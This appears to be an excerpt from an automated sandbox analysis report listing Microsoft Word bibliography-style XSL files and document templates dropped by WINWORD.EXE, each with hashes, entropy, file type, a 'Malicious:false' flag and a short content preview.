                                                MD5:5632C4A81D2193986ACD29EADF1A2177
                                                SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):296658
                                                Entropy (8bit):5.000002997029767
                                                Encrypted:false
                                                SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):268317
                                                Entropy (8bit):5.05419861997223
                                                Encrypted:false
                                                SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                MD5:51D32EE5BC7AB811041F799652D26E04
                                                SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):255948
                                                Entropy (8bit):5.103631650117028
                                                Encrypted:false
                                                SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                MD5:9888A214D362470A6189DEFF775BE139
                                                SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):251032
                                                Entropy (8bit):5.102652100491927
                                                Encrypted:false
                                                SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                MD5:F425D8C274A8571B625EE66A8CE60287
                                                SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):284415
                                                Entropy (8bit):5.00549404077789
                                                Encrypted:false
                                                SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                MD5:33A829B4893044E1851725F4DAF20271
                                                SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):294178
                                                Entropy (8bit):4.977758311135714
                                                Encrypted:false
                                                SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):270198
                                                Entropy (8bit):5.073814698282113
                                                Encrypted:false
                                                SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):217137
                                                Entropy (8bit):5.068335381017074
                                                Encrypted:false
                                                SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):254875
                                                Entropy (8bit):5.003842588822783
                                                Encrypted:false
                                                SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                MD5:377B3E355414466F3E3861BCE1844976
                                                SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):344303
                                                Entropy (8bit):5.023195898304535
                                                Encrypted:false
                                                SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):250983
                                                Entropy (8bit):5.057714239438731
                                                Encrypted:false
                                                SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                MD5:F883B260A8D67082EA895C14BF56DD56
                                                SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Word 2007+
                                                Category:dropped
                                                Size (bytes):51826
                                                Entropy (8bit):5.541375256745271
                                                Encrypted:false
                                                SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                Malicious:false
                                                Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Word 2007+
                                                Category:dropped
                                                Size (bytes):47296
                                                Entropy (8bit):6.42327948041841
                                                Encrypted:false
                                                SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                Malicious:false
                                                Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Word 2007+
                                                Category:dropped
                                                Size (bytes):34415
                                                Entropy (8bit):7.352974342178997
                                                Encrypted:false
                                                SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                Malicious:false
                                                Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Word 2007+
                                                Category:dropped
                                                Size (bytes):3465076
                                                Entropy (8bit):7.898517227646252
                                                Encrypted:false
                                                SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                Malicious:false
